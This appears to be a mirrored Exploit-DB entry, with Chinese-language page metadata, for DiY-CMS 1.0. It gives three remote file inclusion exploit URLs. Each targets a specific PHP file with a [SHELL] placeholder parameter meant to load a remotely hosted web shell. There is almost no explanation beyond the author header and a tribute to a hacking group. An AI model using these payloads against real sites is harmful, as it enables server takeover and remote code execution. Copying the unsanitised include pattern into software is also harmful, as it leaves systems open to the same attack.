DIY-CMS 1.0 – Multiple Remote File Inclusions

• Exploit Database
• 11 阅读

• 作者： LoSt.HaCkEr
  日期： 2010-08-28
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/14822/

• # Exploit Title: [DiY-CMS 1.0 Remote File Inclusion ] 
  # Date: [28-8-2010] 
  # Author: LoSt.HaCkEr~aDaM_TRoJaN
  # Software Link: [http://webscripts.softpedia.com/scriptDownload/DiY-CMS-Download-63258.html] 
  # Version: [v 1.0 ] 
  # Tested on: [Windows XP] 
  # CVE : Hacker town of Musayyib
  #Contact: LoSt.HaCkEr[at]yahoo[dot]com ~0r~ aDaM_TRoJaN@yahoo.com~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  
  Exploit: http://target/diycms_v1.0/diycms_v1.0/modules/guestbook/blocks/control.block.php?lang=[SHeLL]
  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  ~Exploit: http://target/diycms_v1.0/diycms_v1.0/index.php?main_module=[ShEll]
  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  ~Exploit: http://target/diycms_v1.0/diycms_v1.0/includes/general.functions.php?getFile=[SHELL]
  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  
  A special tribute to: DannY.iRaQi - TeaM iRaQ HaCkers
  		
  		function toggle(obj) {
  			var el = document.getElementById(obj);
  			el.style.display = (el.style.display != 'none' ? 'none' : 'block' );
  		}